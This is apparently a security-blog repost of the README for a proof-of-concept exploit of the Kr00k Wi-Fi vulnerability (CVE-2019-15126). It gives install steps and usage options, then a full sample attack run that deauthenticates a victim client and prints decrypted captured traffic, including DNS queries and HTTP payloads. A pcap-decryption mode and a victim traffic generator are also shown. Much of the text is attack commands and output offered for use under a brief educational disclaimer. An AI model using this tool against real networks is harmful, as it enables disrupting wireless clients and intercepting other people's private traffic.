R00kie-Kr00kie : PoC Exploit For The CVE-2019-15126 Kr00k Vulnerability

R00kie-Kr00kie is a PoC exploit for the CVE-2019-15126 kr00k vulnerability. This project is intended for educational purposes only and cannot be used for law violation or personal gain. The author of this project is not responsible for any possible harm caused by the materials.

Requirements

To use these scripts, you will need a WiFi card supporting the active monitor mode with frame injection. We recommend the Atheros AR9280 chip (IEEE 802.11n) we used to develop and test the code. We have tested this PoC on Kali Linux

Installation

# clone main repo
git clone https://github.com/hexway/r00kie-kr00kie.git && cd ./r00kie-kr00kie
# install dependencies
sudo pip3 install -r requirements.txt

Also Read – MSSQLProxy : A Toolkit To Perform Lateral Movement In Restricted Environments

How to use?

Script: r00kie-kr00kie.py

This is the main exploit file that implements the kr00k attack.

->~:python3 r00kie-kr00kie.py -h

Usage: r00kie-kr00kie.py [-h] [-i INTERFACE] [-l CHANNEL] [-b BSSID]
[-c CLIENT] [-n DEAUTH_NUMBER] [-d DEAUTH_DELAY]
[-p PCAP_PATH_READ] [-r PCAP_PATH_RESULT] [-q]

PoC of CVE-2019-15126 kr00k vulnerability

Optional arguments:
-h, –help show this help message and exit
-i INTERFACE, –interface INTERFACE
Set wireless interface name for listen packets
-l CHANNEL, –channel CHANNEL
Set channel for wireless interface (default: 1)
-b BSSID, –bssid BSSID
Set WiFi AP BSSID (example: “01:23:45:67:89:0a”)
-c CLIENT, –client CLIENT
Set WiFi client MAC address (example:
“01:23:45:67:89:0b”)
-n DEAUTH_NUMBER, –deauth_number DEAUTH_NUMBER
Set number of deauth packets for one iteration
(default: 5)
-d DEAUTH_DELAY, –deauth_delay DEAUTH_DELAY
Set delay between sending deauth packets (default: 5)
-p PCAP_PATH_READ, –pcap_path_read PCAP_PATH_READ
Set path to PCAP file for read encrypted packets
-r PCAP_PATH_RESULT, –pcap_path_result PCAP_PATH_RESULT
Set path to PCAP file for write decrypted packets
-q, –quiet Minimal output

In order to start an attack, you need to know bssid of access points, its channel and mac address of the victim. You can find them using the airodump-ng wlan0 utility.

Run the exploit:

->~:python3 r00kie-kr00kie.py -i wlan0 -b D4:38:9C:82:23:7A -c 88:C9:D0:FB:88:D1 -l 11

[!] Kill processes that prevent monitor mode!
[] Wireless interface: wlan0 already in mode monitor [] Set channel: 11 on wireless interface: wlan0
[] Send 5 deauth packets to: 88:C9:D0:FB:88:D1 from: D4:38:9C:82:23:7A [] Send 5 deauth packets to: 88:C9:D0:FB:88:D1 from: D4:38:9C:82:23:7A
[*] Send 5 deauth packets to: 88:C9:D0:FB:88:D1 from: D4:38:9C:82:23:7A

[+] Got a kr00ked packet:
[ Ethernet ]

dst = d4:38:9c:82:23:7a
src = 88:c9:d0:fb:88:d1
type = IPv4
[ IP ]
version = 4
ihl = 5
tos = 0x0
len = 60
id = 30074
flags = DF
frag = 0
ttl = 64
proto = udp
chksum = 0xcce1
src = 192.168.43.161
dst = 8.8.4.4
\options \
[ UDP ]
sport = 60744
dport = domain
len = 40
chksum = 0xa649
[ DNS ]
id = 55281
qr = 0
opcode = QUERY
aa = 0
tc = 0
rd = 1
ra = 0
z = 0
ad = 0
cd = 0
rcode = ok
qdcount = 1
ancount = 0
nscount = 0
arcount = 0
\qd \
|###[ DNS Question Record ]###
| qname = ‘g.whatsapp.net.’
| qtype = A
| qclass = IN
an = None
ns = None
ar = None

[+] Got a kr00ked packet:
[ Ethernet ]

dst = d4:38:9c:82:23:7a
src = 88:c9:d0:fb:88:d1
type = IPv4
[ IP ]
version = 4
ihl = 5
tos = 0x0
len = 60
id = 30075
flags = DF
frag = 0
ttl = 64
proto = udp
chksum = 0xcce0
src = 192.168.43.161
dst = 8.8.4.4
\options \
[ UDP ]
sport = 60744
dport = domain
len = 40
chksum = 0x104b
[ DNS ]
id = 28117
qr = 0
opcode = QUERY
aa = 0
tc = 0
rd = 1
ra = 0
z = 0
ad = 0
cd = 0
rcode = ok
qdcount = 1
ancount = 0
nscount = 0
arcount = 0
\qd \
|###[ DNS Question Record ]###
| qname = ‘g.whatsapp.net.’
| qtype = AAAA
| qclass = IN
an = None
ns = None
ar = None

Also, if you have already intercepted traffic (pcap file) after the kr00t attack, you can decrypt:

->~:python3 r00kie-kr00kie.py -p encrypted_packets.pcap

[] Read packets from: encrypted_packets.pcap …. [] All packets are read, packet analysis is in progress ….

[+] Got a kr00ked packet:
[ Ethernet ]

dst = d4:38:9c:82:23:7a
src = 88:c9:d0:fb:88:d1
type = IPv4
[IP]
version = 4
ihl = 5
tos = 0x0
len = 490
id = 756
flags = DF
frag = 0
ttl = 64
proto = tcp
chksum = 0xd0ca
src = 192.168.43.161
dst = 1.1.1.1
\options \
[ TCP ]
sport = 34789
dport = 1337
seq = 3463744441
ack = 3909086929
dataofs = 8
reserved = 0
flags = PA
window = 1369
chksum = 0x65ee
urgptr = 0
options = [(‘NOP’, None), (‘NOP’, None), (‘Timestamp’, (1084858, 699843440))]
[ Raw ]
load = ‘POST /post_form.html HTTP/1.1\r\nHost: sfdsfsdf:1337\r\nConnection: keep-alive\r\nContent-Length: 138240\r\nOrigin: http://sfdsfsdf.ch:1337\r\nUser-Agent: Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36\r\nContent-Type: application/json\r\nAccept: /\r\nReferer: http://sfdsfsdf.ch:1337/post_form.html\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9,ru;q=0.8\r\n\r\n’

[+] Got a kr00ked packet:
[ Ethernet ]

dst = d4:38:9c:82:23:7a
src = 88:c9:d0:fb:88:d1
type = IPv4
[ IP ]
version = 4
ihl = 5
tos = 0x0
len = 60
id = 42533
flags = DF
frag = 0
ttl = 64
proto = tcp
chksum = 0x2f47
src = 192.168.43.161
dst = 1.1.1.1
\options \
[ TCP ]
sport = 34792
dport = 1337
seq = 71773087
ack = 0
dataofs = 10
reserved = 0
flags = S
window = 65535
chksum = 0x97df
urgptr = 0
options = [(‘MSS’, 1460), (‘SAckOK’, b”), (‘Timestamp’, (1084858, 0)), (‘NOP’, None), (‘WScale’, 6)]

[+] Got a kr00ked packet:
[ Ethernet ]

dst = d4:38:9c:82:23:7a
src = 88:c9:d0:fb:88:d1
type = IPv4
[ IP ]
version = 4
ihl = 5
tos = 0x0
len = 1460
id = 35150
flags = DF
frag = 0
ttl = 64
proto = tcp
chksum = 0x46a6
src = 192.168.43.161
dst = 1.1.1.1
\options \
[ TCP ]
sport = 36020
dport = 1337
seq = 395101552
ack = 1111748198
dataofs = 8
reserved = 0
flags = A
window = 1369
chksum = 0x35d2
urgptr = 0
options = [(‘NOP’, None), (‘NOP’, None), (‘Timestamp’, (1113058, 700129572))]
[ Raw ]
load = “pik, @default_pass, @_hexway !!! Yeah! It’s working! I can read this text! I’m so happy!! Now I’m going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It’s working! I can read this text! I’m so happy!! Now I’m going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It’s working! I can read this text! I’m so happy!! Now I’m going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It’s working! I can read this text! I’m so happy!! Now I’m going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It’s working! I can read this text! I’m so happy!! Now I’m going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It’s working! I can read this text! I’m so happy!! Now I’m going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It’s working! I can read this text! I’m so happy!! Now I’m going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It’s working! I can read this text! I’m so happy!! Now I’m going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It’s working! I can read this text! I’m so happy!! Now I’m going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It’s working! I can read this text! I’m so happy!! Now I’m going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It’s working! I can”

[+] Got a kr00ked packet:
[ Ethernet ]

dst = d4:38:9c:82:23:7a
src = 88:c9:d0:fb:88:d1
type = IPv4
[ IP ]
version = 4
ihl = 5
tos = 0x0
len = 60
id = 17897
flags = DF
frag = 0
ttl = 64
proto = tcp
chksum = 0x8f83
src = 192.168.43.161
dst = 95.85.25.177
\options \
[ TCP ]
sport = 36266
dport = 1337
seq = 3375779416
ack = 0
dataofs = 10
reserved = 0
flags = S
window = 65535
chksum = 0x2c7d
urgptr = 0
options = [(‘MSS’, 1460), (‘SAckOK’, b”), (‘Timestamp’, (1117105, 0)), (‘NOP’, None), (‘WScale’, 6)]
[+] Found 4 kr00ked packets and decrypted packets saved in: kr00k.pcap

Script: traffic_generator.py

This script generates UDP traffic from the victim, to demonstrate the kr00k attack

->~:python3 traffic_generator.py
Sending payload to the UDP port 53 on 8.8.8.8
Press Ctrl+C to exit

R K

Recent Posts

Kali Linux 2024.4 Released, What’s New?

Kali Linux 2024.4, the final release of 2024, brings a wide range of updates and…

5 hours ago

Lifetime-Amsi-EtwPatch : Disabling PowerShell’s AMSI And ETW Protections

This Go program applies a lifetime patch to PowerShell to disable ETW (Event Tracing for…

5 hours ago

GPOHunter – Active Directory Group Policy Security Analyzer

GPOHunter is a comprehensive tool designed to analyze and identify security misconfigurations in Active Directory…

2 days ago

2024 MITRE ATT&CK Evaluation Results – Cynet Became a Leader With 100% Detection & Protection

Across small-to-medium enterprises (SMEs) and managed service providers (MSPs), the top priority for cybersecurity leaders…

5 days ago

SecHub : Streamlining Security Across Software Development Lifecycles

The free and open-source security platform SecHub, provides a central API to test software with…

1 week ago

Hawker : The Comprehensive OSINT Toolkit For Cybersecurity Professionals

Don't worry if there are any bugs in the tool, we will try to fix…

1 week ago